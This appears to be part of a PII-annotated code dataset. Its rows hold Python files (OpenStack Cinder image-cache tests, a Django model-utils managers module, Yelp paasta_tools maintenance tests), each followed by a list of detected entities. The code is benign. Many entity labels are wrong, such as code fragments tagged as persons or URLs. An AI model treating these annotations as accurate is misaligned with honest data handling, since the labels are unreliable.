+ found_entry = cache.get_entry(self.context, + self.volume_ovo, + entry['image_id'], + image_meta) + self.assertDictEqual(entry, found_entry) + (self.mock_db. 
+ image_volume_cache_get_and_update_last_used.assert_called_once_with)( + self.context, + entry['image_id'], + **expect + ) + + msg = self.notifier.notifications[0] + self.assertEqual('image_volume_cache.hit', msg['event_type']) + self.assertEqual('INFO', msg['priority']) + self.assertEqual(entry['host'], msg['payload']['host']) + self.assertEqual(entry['image_id'], msg['payload']['image_id']) + self.assertEqual(1, len(self.notifier.notifications)) + + def test_get_entry_not_exists(self): + cache = self._build_cache() + image_meta = { + 'is_public': True, + 'owner': '70a599e0-31e7-49b7-b260-868f441e862b', + 'properties': { + 'virtual_size': '1.7' + }, + 'updated_at': timeutils.utcnow(with_timezone=True) + } + image_id = 'PI:KEY' + (self.mock_db. + image_volume_cache_get_and_update_last_used.return_value) = None + + found_entry = cache.get_entry(self.context, + self.volume_ovo, + image_id, + image_meta) + + self.assertIsNone(found_entry) + + msg = self.notifier.notifications[0] + self.assertEqual('image_volume_cache.miss', msg['event_type']) + self.assertEqual('INFO', msg['priority']) + self.assertEqual(self.volume.host, msg['payload']['host']) + self.assertEqual(image_id, msg['payload']['image_id']) + self.assertEqual(1, len(self.notifier.notifications)) + + @mock.patch('cinder.objects.Volume.get_by_id') + def test_get_entry_needs_update(self, mock_volume_by_id): + cache = self._build_cache() + entry = self._build_entry() + image_meta = { + 'is_public': True, + 'owner': '70a599e0-31e7-49b7-b260-868f441e862b', + 'properties': { + 'virtual_size': '1.7' + }, + 'updated_at': entry['image_updated_at'] + timedelta(hours=2) + } + (self.mock_db. + image_volume_cache_get_and_update_last_used.return_value) = entry + + mock_volume = mock.MagicMock() + mock_volume_by_id.return_value = mock_volume + + found_entry = cache.get_entry(self.context, + self.volume_ovo, + entry['image_id'], + image_meta) + + # Expect that the cache entry is not returned and the image-volume + # for it is deleted. 
+ self.assertIsNone(found_entry) + self.mock_volume_api.delete.assert_called_with(self.context, + mock_volume) + msg = self.notifier.notifications[0] + self.assertEqual('image_volume_cache.miss', msg['event_type']) + self.assertEqual('INFO', msg['priority']) + self.assertEqual(self.volume.host, msg['payload']['host']) + self.assertEqual(entry['image_id'], msg['payload']['image_id']) + self.assertEqual(1, len(self.notifier.notifications)) + + def test_create_cache_entry(self): + cache = self._build_cache() + entry = self._build_entry() + image_meta = { + 'updated_at': entry['image_updated_at'] + } + self.mock_db.image_volume_cache_create.return_value = entry + created_entry = cache.create_cache_entry(self.context, + self.volume_ovo, + entry['image_id'], + image_meta) + self.assertEqual(entry, created_entry) + self.mock_db.image_volume_cache_create.assert_called_once_with( + self.context, + self.volume_ovo.host, + self.volume_ovo.cluster_name, + entry['image_id'], + entry['image_updated_at'].replace(tzinfo=None), + self.volume_ovo.id, + self.volume_ovo.size + ) + + def test_ensure_space_unlimited(self): + cache = self._build_cache(max_gb=0, max_count=0) + has_space = cache.ensure_space(self.context, self.volume) + self.assertTrue(has_space) + + self.volume.size = 500 + has_space = cache.ensure_space(self.context, self.volume) + self.assertTrue(has_space) + + def test_ensure_space_no_entries(self): + cache = self._build_cache(max_gb=100, max_count=10) + self.mock_db.image_volume_cache_get_all.return_value = [] + + self.volume_ovo.size = 5 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertTrue(has_space) + + self.volume_ovo.size = 101 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertFalse(has_space) + + def test_ensure_space_need_gb(self): + cache = self._build_cache(max_gb=30, max_count=10) + mock_delete = mock.patch.object(cache, '_delete_image_volume').start() + + entries = [] + entry1 = self._build_entry(size=12) + entries.append(entry1) + entry2 = self._build_entry(size=5) + entries.append(entry2) + entry3 = self._build_entry(size=10) + entries.append(entry3) + self.mock_db.image_volume_cache_get_all.return_value = entries + + self.volume_ovo.size = 15 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertTrue(has_space) + self.assertEqual(2, mock_delete.call_count) + mock_delete.assert_any_call(self.context, entry2) + mock_delete.assert_any_call(self.context, entry3) + + def test_ensure_space_need_count(self): + cache = self._build_cache(max_gb=30, max_count=2) + mock_delete = mock.patch.object(cache, '_delete_image_volume').start() + + entries = [] + entry1 = self._build_entry(size=10) + entries.append(entry1) + entry2 = self._build_entry(size=5) + entries.append(entry2) + self.mock_db.image_volume_cache_get_all.return_value = entries + + self.volume_ovo.size = 12 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertTrue(has_space) + self.assertEqual(1, mock_delete.call_count) + mock_delete.assert_any_call(self.context, entry2) + + def test_ensure_space_need_gb_and_count(self): + cache = self._build_cache(max_gb=30, max_count=3) + mock_delete = mock.patch.object(cache, '_delete_image_volume').start() + + entries = [] + entry1 = self._build_entry(size=10) + entries.append(entry1) + entry2 = self._build_entry(size=5) + entries.append(entry2) + entry3 = self._build_entry(size=12) + entries.append(entry3) + self.mock_db.image_volume_cache_get_all.return_value = entries + + 
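+        # 10 + 5 + 12 = 27 GB are already cached and the count limit (3) is
+        # full, so caching a 16 GB volume must evict entries until both the
+        # max_gb and max_count constraints hold (here: entry2 and entry3).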
self.volume_ovo.size = 16 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertTrue(has_space) + self.assertEqual(2, mock_delete.call_count) + mock_delete.assert_any_call(self.context, entry2) + mock_delete.assert_any_call(self.context, entry3) + + def test_ensure_space_cant_free_enough_gb(self): + cache = self._build_cache(max_gb=30, max_count=10) + mock_delete = mock.patch.object(cache, '_delete_image_volume').start() + + # list(dict) would yield only the dict's keys; wrap the entry in a list + entries = [self._build_entry(size=25)] + self.mock_db.image_volume_cache_get_all.return_value = entries + + self.volume_ovo.size = 50 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertFalse(has_space) + mock_delete.assert_not_called() +",12065,"[['PERSON', 'fake_constants'], ['LOCATION', 'TestCase'], ['PERSON', ""msg['priority""], ['PERSON', ""msg['priority""], ['PERSON', ""msg['priority""], ['PERSON', 'mock_volume_by_id.return_value = mock_volume\n\n '], ['PERSON', ""msg['priority""], ['PERSON', 'entry2'], ['PERSON', 'entry3 = self._build_entry(size=10'], ['PERSON', 'max_count=2'], ['PERSON', 'entry2'], ['PERSON', 'entry2'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', 'cinder.im'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.co'], ['URL', 'ctxt.ge'], ['URL', 'self.co'], ['URL', 'cache.Im'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'cache.no'], ['URL', 'self.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'ovo.cl'], ['URL', 'self.volume.cl'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'used.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'mock.pa'], ['URL', 'cinder.objects.Volume.ge'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'mock.Ma'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'api.delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.re'], ['URL', 'cache.cr'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.as'], ['URL', 'self.co'], ['URL', 'ovo.cl'], ['URL', 'ovo.id'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.volume.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.mo'],
['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'delete.as']]" +73,"from types import ClassType +import warnings + +from django.contrib.contenttypes.models import ContentType +from django.db import models +from django.db.models.fields.related import OneToOneField +from django.db.models.manager import Manager +from django.db.models.query import QuerySet + +import django + +class InheritanceQuerySet(QuerySet): + def select_subclasses(self, *subclasses): + if not subclasses: + subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects() + if isinstance(rel.field, OneToOneField) + and issubclass(rel.field.model, self.model)] + new_qs = self.select_related(*subclasses) + new_qs.subclasses = subclasses + return new_qs + + def _clone(self, klass=None, setup=False, **kwargs): + for name in ['subclasses', '_annotated']: + if hasattr(self, name): + kwargs[name] = getattr(self, name) + return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs) + + def annotate(self, *args, **kwargs): + qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs) + qset._annotated = [a.default_alias for a in args] + kwargs.keys() + return qset + + def get_subclass(self, obj): + """""" + FIX see https://bitbucket.PI:KEY + and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses + """""" + def get_attribute(obj, s): + try: + return getattr(obj,s, False) + except obj.__class__.DoesNotExist: + return False + + if django.VERSION[0:2] < (1, 5): + sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj] + else: + sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj] + return sub_obj[0] + + def iterator(self): + iter = super(InheritanceQuerySet, self).iterator() + if getattr(self, 'subclasses', False): + for obj in iter: + sub_obj = self.get_subclass(obj) + if getattr(self, '_annotated', False): + for k in self._annotated: + setattr(sub_obj, k, getattr(obj, k)) + + yield sub_obj + else: + for obj in iter: + yield obj + + +class InheritanceManager(models.Manager): + use_for_related_fields = True + + def get_query_set(self): + return InheritanceQuerySet(self.model) + + def select_subclasses(self, *subclasses): + return self.get_query_set().select_subclasses(*subclasses) + + def get_subclass(self, *args, **kwargs): + return self.get_query_set().select_subclasses().get(*args, **kwargs) + + +class InheritanceCastMixin(object): + def cast(self): + results = tuple(self.values_list('pk', 'real_type')) + type_to_pks = {} + for pk, real_type_id in results: + type_to_pks.setdefault(real_type_id, []).append(pk) + content_types = ContentType.objects.in_bulk(type_to_pks.keys()) + pk_to_child = {} + for real_type_id, pks in 
type_to_pks.iteritems(): + content_type = content_types[real_type_id] + child_type = content_type.model_class() + children = child_type._default_manager.in_bulk(pks) + for pk, child in children.iteritems(): + pk_to_child[pk] = child + children = [] + # sort children into same order as parents where returned + for pk, real_type_id in results: + children.append(pk_to_child[pk]) + return children + + +class QueryManager(models.Manager): + def __init__(self, *args, **kwargs): + if args: + self._q = args[0] + else: + self._q = models.Q(**kwargs) + super(QueryManager, self).__init__() + + def order_by(self, *args): + self._order_by = args + return self + + def get_query_set(self): + qs = super(QueryManager, self).get_query_set().filter(self._q) + if hasattr(self, '_order_by'): + return qs.order_by(*self._order_by) + return qs + + +class PassThroughManager(models.Manager): + """""" + Inherit from this Manager to enable you to call any methods from your + custom QuerySet class from your manager. Simply define your QuerySet + class, and return an instance of it from your manager's `get_query_set` + method. + + Alternately, if you don't need any extra methods on your manager that + aren't on your QuerySet, then just pass your QuerySet class to the + ``for_queryset_class`` class method. + + class PostQuerySet(QuerySet): + def enabled(self): + return self.filter(disabled=False) + + class Post(models.Model): + objects = PassThroughManager.for_queryset_class(PostQuerySet)() + + """""" + # pickling causes recursion errors + _deny_methods = ['__getstate__', '__setstate__', '_db'] + + def __init__(self, queryset_cls=None): + self._queryset_cls = queryset_cls + super(PassThroughManager, self).__init__() + + def __getattr__(self, name): + if name in self._deny_methods: + raise AttributeError(name) + return getattr(self.get_query_set(), name) + + def get_query_set(self): + if self._queryset_cls is not None: + kargs = {'model': self.model} + if hasattr(self, '_db'): + kargs['using'] = self._db + return self._queryset_cls(**kargs) + return super(PassThroughManager, self).get_query_set() + + @classmethod + def for_queryset_class(cls, queryset_cls): + class _PassThroughManager(cls): + def __init__(self): + return super(_PassThroughManager, self).__init__() + + def get_query_set(self): + kwargs = {} + if hasattr(self, ""_db""): + kwargs[""using""] = self._db + return queryset_cls(self.model, **kwargs) + + return _PassThroughManager + + +def manager_from(*mixins, **kwds): + """""" + Returns a Manager instance with extra methods, also available and + chainable on generated querysets. + + (By George Sakkis, originally posted at + http://djangosnippets.org/snippets/2117/) + + :param mixins: Each ``mixin`` can be either a class or a function. The + generated manager and associated queryset subclasses extend the mixin + classes and include the mixin functions (as methods). + + :keyword queryset_cls: The base queryset class to extend from + (``django.db.models.query.QuerySet`` by default). + + :keyword manager_cls: The base manager class to extend from + (``django.db.models.manager.Manager`` by default). 
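+
+    A minimal usage sketch (``adults`` and ``Person`` are illustrative
+    names only, not part of this module):
+
+        def adults(self):
+            return self.filter(age__gte=18)
+
+        class Person(models.Model):
+            age = models.IntegerField()
+            objects = manager_from(adults)
+
+        Person.objects.adults()                     # manager method
+        Person.objects.filter(age__lt=65).adults()  # chainable on querysets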
+ + """""" + warnings.warn( + ""manager_from is pending deprecation; use PassThroughManager instead."", + PendingDeprecationWarning, + stacklevel=2) + # collect separately the mixin classes and methods + bases = [kwds.get('queryset_cls', QuerySet)] + methods = {} + for mixin in mixins: + if isinstance(mixin, (ClassType, type)): + bases.append(mixin) + else: + try: methods[mixin.__name__] = mixin + except AttributeError: + raise TypeError('Mixin must be class or function, not %s' % + mixin.__class__) + # create the QuerySet subclass + id = hash(mixins + tuple(kwds.iteritems())) + new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods) + # create the Manager subclass + bases[0] = manager_cls = kwds.get('manager_cls', Manager) + new_manager_cls = type('Manager_%d' % id, tuple(bases), methods) + # and finally override new manager's get_query_set + super_get_query_set = manager_cls.get_query_set + def get_query_set(self): + # first honor the super manager's get_query_set + qs = super_get_query_set(self) + # and then try to bless the returned queryset by reassigning it to the + # newly created Queryset class, though this may not be feasible + if not issubclass(new_queryset_cls, qs.__class__): + raise TypeError('QuerySet subclass conflict: cannot determine a ' + 'unique class for queryset instance') + qs.__class__ = new_queryset_cls + return qs + new_manager_cls.get_query_set = get_query_set + return new_manager_cls() +",8353,"[['PERSON', 'qset = super(InheritanceQuerySet'], ['NRP', 'sub_obj'], ['PERSON', 'order_by'], ['PERSON', 'kargs'], ['PERSON', 'kwds'], ['PERSON', 'George Sakkis'], ['PERSON', 'mixin.__class'], ['LOCATION', 'qs.__class'], ['URL', 'https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses'], ['URL', 'http://djangosnippets.org/snippets/2117/'], ['URL', 'django.contrib.contenttypes.mo'], ['URL', 'django.db.models.fields.re'], ['URL', 'django.db.models.ma'], ['URL', 'django.db.mo'], ['URL', 'rel.va'], ['URL', 'self.mo'], ['URL', 'meta.ge'], ['URL', 'rel.fi'], ['URL', 'rel.field.mo'], ['URL', 'self.mo'], ['URL', 'self.se'], ['URL', 'qs.su'], ['URL', 'a.de'], ['URL', 'kwargs.ke'], ['URL', 'django.VE'], ['URL', 'self.su'], ['URL', 'self.su'], ['URL', 'self.ge'], ['URL', 'models.Ma'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'pks.se'], ['URL', 'ContentType.objects.in'], ['URL', 'pks.ke'], ['URL', 'pks.it'], ['URL', 'type.mo'], ['URL', 'manager.in'], ['URL', 'children.it'], ['URL', 'models.Ma'], ['URL', 'models.Ma'], ['URL', 'self.fi'], ['URL', 'models.Mo'], ['URL', 'PassThroughManager.fo'], ['URL', 'self.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'django.db.mo'], ['URL', 'django.db.models.manager.Ma'], ['URL', 'kwds.ge'], ['URL', 'kwds.it'], ['URL', 'kwds.ge'], ['URL', 'cls.ge'], ['URL', 'cls.ge']]" +74,"# Copyright 2015-2016 Yelp Inc. +# +# Licensed under the Apache License, Version 2.0 (the ""License""); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+import mock + +from paasta_tools import paasta_maintenance + + +@mock.patch(""paasta_tools.mesos_maintenance.is_host_drained"", autospec=True) +@mock.patch( + ""paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start"", autospec=True +) +def test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained): + mock_is_host_drained.return_value = False + mock_get_hosts_past_maintenance_start.return_value = [] + assert not paasta_maintenance.is_safe_to_kill(""blah"") + + mock_is_host_drained.return_value = False + mock_get_hosts_past_maintenance_start.return_value = [""blah""] + assert paasta_maintenance.is_safe_to_kill(""blah"") + + mock_is_host_drained.return_value = True + mock_get_hosts_past_maintenance_start.return_value = [""blah""] + assert paasta_maintenance.is_safe_to_kill(""blah"") + + mock_is_host_drained.return_value = True + mock_get_hosts_past_maintenance_start.return_value = [] + assert paasta_maintenance.is_safe_to_kill(""blah"") + + +@mock.patch(""paasta_tools.paasta_maintenance.is_hostname_local"", autospec=True) +def test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,): + mock_is_hostname_local.return_value = False + assert paasta_maintenance.is_safe_to_drain(""non-localhost"") is False + + +@mock.patch(""paasta_tools.paasta_maintenance.getfqdn"", autospec=True) +@mock.patch(""paasta_tools.paasta_maintenance.gethostname"", autospec=True) +def test_is_hostname_local_works(mock_gethostname, mock_getfqdn): + mock_gethostname.return_value = ""foo"" + mock_getfqdn.return_value = ""foo.bar"" + assert paasta_maintenance.is_hostname_local(""localhost"") is True + assert paasta_maintenance.is_hostname_local(""foo"") is True + assert paasta_maintenance.is_hostname_local(""foo.bar"") is True + assert paasta_maintenance.is_hostname_local(""something_different"") is False + + +@mock.patch( + ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True +) +def test_are_local_tasks_in_danger_fails_safe_with_false( + mock_load_system_paasta_config, +): + """"""If something unexpected happens that we don't know how to + interpret, we make sure that we fail with ""False"" so that processes + move on and don't deadlock. 
In general the answer to ""is it safe to drain"" + is ""yes"" if mesos can't be reached, etc"""""" + mock_load_system_paasta_config.side_effect = Exception + assert paasta_maintenance.are_local_tasks_in_danger() is False + + +@mock.patch( + ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True +) +def test_are_local_tasks_in_danger_is_false_with_nothing_running( + mock_marathon_services_running_here, mock_load_system_paasta_config +): + mock_marathon_services_running_here.return_value = [] + assert paasta_maintenance.are_local_tasks_in_danger() is False + + +@mock.patch( + ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True +) +@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True) +@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True) +def test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service( + mock_is_healthy_in_haproxy, + mock_get_backends, + mock_marathon_services_running_here, + mock_load_system_paasta_config, +): + mock_is_healthy_in_haproxy.return_value = False + mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)] + assert paasta_maintenance.are_local_tasks_in_danger() is False + mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY) + + +@mock.patch( + ""paasta_tools.paasta_maintenance.utils.load_system_paasta_config"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.marathon_services_running_here"", autospec=True +) +@mock.patch(""paasta_tools.paasta_maintenance.get_backends"", autospec=True) +@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy"", autospec=True) +@mock.patch(""paasta_tools.paasta_maintenance.synapse_replication_is_low"", autospec=True) +def test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger( + mock_synapse_replication_is_low, + mock_is_healthy_in_haproxy, + mock_get_backends, + mock_marathon_services_running_here, + mock_load_system_paasta_config, +): + mock_is_healthy_in_haproxy.return_value = True + mock_synapse_replication_is_low.return_value = True + mock_marathon_services_running_here.return_value = [(""service"", ""instance"", 42)] + assert paasta_maintenance.are_local_tasks_in_danger() is True + mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY) + assert mock_synapse_replication_is_low.call_count == 1 + + +@mock.patch( + ""paasta_tools.paasta_maintenance.load_marathon_service_config"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.load_smartstack_info_for_service"", autospec=True +) +@mock.patch( + ""paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace"", + autospec=True, +) +@mock.patch( + ""paasta_tools.paasta_maintenance.get_replication_for_services"", autospec=True +) +def test_synapse_replication_is_low_understands_underreplicated_services( + mock_get_replication_for_services, + mock_get_expected_instance_count_for_namespace, + mock_load_smartstack_info_for_service, + mock_load_marathon_service_config, +): + mock_load_marathon_service_config.return_value.get_registrations.return_value = ( + ""service.main"" + ) + mock_get_expected_instance_count_for_namespace.return_value = 3 + mock_load_smartstack_info_for_service.return_value = { + ""local_region"": {""service.main"": 
""up""} + } + mock_get_replication_for_services.return_value = {""service.main"": 1} + local_backends = [""foo""] + system_paasta_config = mock.MagicMock() + assert ( + paasta_maintenance.synapse_replication_is_low( + service=""service"", + instance=""instance"", + system_paasta_config=system_paasta_config, + local_backends=local_backends, + ) + is True + ) + + +@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True) +def test_is_healthy_in_harproxy_healthy_path(mock_gethostbyname,): + mock_gethostbyname.return_value = ""127.0.0.1"" + local_port = 42 + backends = [ + {""status"": ""UP"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""} + ] + assert ( + paasta_maintenance.is_healthy_in_haproxy( + local_port=local_port, backends=backends + ) + is True + ) + + +@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True) +def test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname,): + mock_gethostbyname.return_value = ""127.0.0.1"" + local_port = 42 + backends = [ + {""status"": ""DOWN"", ""pxname"": ""service.main"", ""svname"": ""127.0.0.1:42_hostname""} + ] + assert ( + paasta_maintenance.is_healthy_in_haproxy( + local_port=local_port, backends=backends + ) + is False + ) + + +@mock.patch(""paasta_tools.paasta_maintenance.gethostbyname"", autospec=True) +def test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname,): + mock_gethostbyname.return_value = ""127.0.0.1"" + local_port = 42 + backends = [ + { + ""status"": ""DOWN"", + ""pxname"": ""service.main"", + ""svname"": ""127.0.0.1:666_otherhostname"", + } + ] + assert ( + paasta_maintenance.is_healthy_in_haproxy( + local_port=local_port, backends=backends + ) + is False + ) +",8242,"[['DATE_TIME', '2015-2016'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'paasta_maintenance.is_safe_to_drain(""non'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch(""paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['NRP', 'mock_synapse_replication_is_low.call_count =='], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.ge'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'local.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], 
['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostname.re'], ['URL', 'getfqdn.re'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'config.si'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'haproxy.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.sy'], ['URL', 'haproxy.re'], ['URL', 'low.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'low.ca'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'config.re'], ['URL', 'value.ge'], ['URL', 'registrations.re'], ['URL', 'service.ma'], ['URL', 'namespace.re'], ['URL', 'service.re'], ['URL', 'service.ma'], ['URL', 'services.re'], ['URL', 'service.ma'], ['URL', 'mock.Ma'], ['URL', 'maintenance.sy'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 